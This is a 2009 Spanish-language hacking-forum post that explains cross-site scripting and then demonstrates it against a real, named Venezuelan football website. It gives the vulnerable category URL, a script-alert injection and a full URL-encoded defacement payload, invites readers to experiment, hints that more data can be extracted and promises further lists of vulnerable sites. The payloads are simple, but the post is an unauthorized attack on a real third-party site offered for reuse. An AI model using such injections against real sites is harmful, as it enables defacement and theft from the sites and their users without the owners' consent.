Bueno amigos mios acal les dejo una info muy util sobre como hacer un XSS basico...pero para los que no sepan que es primero les dare una definicion de lo que significa XSS.
XSS:
Su nombre original "Cross Site scripting", y renombrado XSS para que no sea confundido con las CSS, (hojas de estilo en cascada), originalmente abarcaba cualquier ataque que permitiera ejecutar código de "scripting", como VBscript o Javascript, en el contexto de otro dominio.
Recientemente se acostumbra a llamar a los ataques de XSS "HTML Injection", sin embargo el término correcto es XSS. Estos errores se pueden encontrar en cualquier aplicación HTML, no se limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador web en sí. El problema está en que normalmente no se validan correctamente los datos de entrada que son usados en cierta aplicación.
Tomado de doña wiki: www.wikipedia.com ..xD
Ahora despues de ver algunas definiciones de lo que es un XSS vamos a los mas bacano...la practica...
por ahora tomare una pagina web venezolana: http:\\www.venezuelaesfutbol.com
Ingresando a alguna de las categorias de la web podemos ver la siguiente url en la barra de dirección de nuestro navegador:
http://www.venezuelaesfutbol.com/categoria.php?categoria_id=11
entonces nos enfocaremos en esta parte....
http://www.venezuelaesfutbol.com/
categoria.php?categoria_id=11modificando la parte que dice...
http://www.venezuelaesfutbol.com/
categoria.php?categoria_id=11...si cambiamos
categoria_id=11 por...
- Código:
-
categoria_id=<script>alert(/Viva la Masamorra!!!/)</script>
Pues amigos mios obtendriamos un gran...
XSS.....
Y si queremos podemos utilizar mas comandos html...si kieren ver como keda despues de jugar un poco aka les dejo elo link...
http://www.venezuelaesfutbol.com/categoria.php?categoria_id=%3Cmarquee%3E%3Ch1%3E%3Cfont%20face=%22Ravie%22%20size=5%20color=%22yellow%22%3E...:::Si%20hay%20Citricas:::...%3C/font%3E%3C/center%3E%3Ch1%3E%3C/marquee%3E
y ak auna imagen de muestra...
Y si somos mas curiosos y "cacharreamos" e imvestigamos un poco mas observen lo ke se puede obtener...
Casi xD......pero bueno omiti algunas cosas en esta imagen por seguridad y ética....xD
ps en los dias siguientes si veo ke el post da resultado y si no soy tan salao y no han posteado este tema todavia entonces procedere a mostrarles mas paginas vulnerables a XSS y algunas cosas mas....
Vie 22 Mayo 2009, 22:14 por NewByte